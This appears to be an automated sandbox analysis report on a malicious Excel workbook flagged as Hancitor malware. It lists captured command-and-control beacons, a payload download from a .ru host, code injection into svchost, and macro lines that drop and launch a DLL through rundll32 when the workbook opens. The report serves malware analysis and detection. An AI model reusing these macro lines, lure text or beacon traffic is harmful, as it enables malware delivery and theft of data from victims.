                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341FE0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,5_2_00341FE0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ECECA93.emf
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s0lom0n.ruCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: http://aidgodown.ru/8/forum.php
                  Source: rundll32.exeString found in binary or memory: http://api.ipify.org
                  Source: svchost.exe, 00000007.00000002.2132894094.00000000001F4000.00000004.00000020.sdmpString found in binary or memory: http://api.ipify.org/?format=xml
                  Source: rundll32.exe, 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, rundll32.exe, 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: http://relifleappin.ru/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.2348733440.000000000051D000.00000004.00000020.sdmpString found in binary or memory: http://tholeferli.com/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2348788273.0000000000553000.00000004.00000020.sdmpString found in binary or memory: http://tholeferli.com/8/forum.phponnect
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                  Source: rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                  Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click
                  Source: Screenshot number: 4Screenshot OCR: Enable content button from the yellow bar above
                  Document contains OLE streams with PE executables
                  Source: 0722_2857746751.xlsStream path 'MBD0132A5F4/\x1Ole10Native' : MZ signature found
                  Document contains an embedded VBA macro which may execute processes
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Document contains an embedded VBA macro with suspicious strings
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Name pafs As Environ$("temp") & "\" & "omsh.dll"
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Source: 0722_2857746751.xlsOLE, VBA macro line: vcbc = Environ$("temp")
                  Source: 0722_2857746751.xlsOLE, VBA macro line: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1
                  Source: 0722_2857746751.xlsOLE, VBA macro line: usx = Environ$("temp")
                  Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function nam, String environ: Name pafs As Environ$("temp") & "\" & "omsh.dll"Name: nam
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: vcbc = Environ$("temp")Name: Workbook_Open
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1Name: Workbook_Open
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function xxx, String environ: usx = Environ$("temp")Name: xxx
                  Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                  Source: 0722_2857746751.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions exec, run, environ
                  Office process drops PE file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\532.dll
                  Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004293B0: GetFileInformationByHandle,DeviceIoControl,7_2_004293B0
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Sub Workbook_Open()
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                  Source: 0722_2857746751.xlsOLE indicator, VBA macros: true
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\532.dll 8EFAC1531E83525BB0806EEBCA0BB9A797A18FEB1848A4CEEE4A88FDB85CBBBD
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0034DFA0 appears 41 times
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeSection loaded: imjp12k.dll
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@9/7@7/5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,7_2_00415800
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\IMJP10
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeMutant created: \Sessions\1\BaseNamedObjects\{6597B945-4806-49df-9D96-BABAB5D250A7}
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD5C.tmp
                  Source: 0722_2857746751.xlsOLE indicator, Workbook stream: true
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: 0722_2857746751.xlsVirustotal: Detection: 29%
                  Source: 0722_2857746751.xlsReversingLabs: Detection: 22%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe /Migration
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00343580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034C6F3 push ecx; ret 5_2_0034C706
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034DFE5 push ecx; ret 5_2_0034DFF8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036F992 push ecx; retf 5_2_0036F993
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00435E20 push dword ptr [eax+04h]; ret 7_2_00435E4F
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\532.dllJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\532.dll
                  Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_5-9703
                  Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_5-8525
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2324 | Thread sleep time: -240000s >= -30000s
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00343400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo | 5_2_00343400
                  Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node | graph_5-9256
                  Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress | 5_2_00343580
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0036EAD1 mov eax, dword ptr fs:[00000030h] | 5_2_0036EAD1
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0036E607 push dword ptr fs:[00000030h] | 5_2_0036E607
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0036EA00 mov eax, dword ptr fs:[00000030h] | 5_2_0036EA00
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00341390 GetProcessHeap,RtlAllocateHeap | 5_2_00341390
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0035203E __decode_pointer,SetUnhandledExceptionFilter | 5_2_0035203E
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0035201C SetUnhandledExceptionFilter,__encode_pointer | 5_2_0035201C
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034B083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_0034B083
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034CA9B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_0034CA9B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040115C SetUnhandledExceptionFilter,exit | 7_2_0040115C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401150 SetUnhandledExceptionFilter | 7_2_00401150
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004013C9 SetUnhandledExceptionFilter | 7_2_004013C9

                  HIPS / PFW / Operating System Protection Evasion:

                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exe | Domain query: pospvisis.com
                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 50.16.239.65 80
                  Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 8.211.241.0 80
                  Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: tholeferli.com
                  Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 54.235.88.121 80
                  Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.147.115.74 80
                  Source: C:\Windows\SysWOW64\svchost.exe | Domain query: api.ipify.org
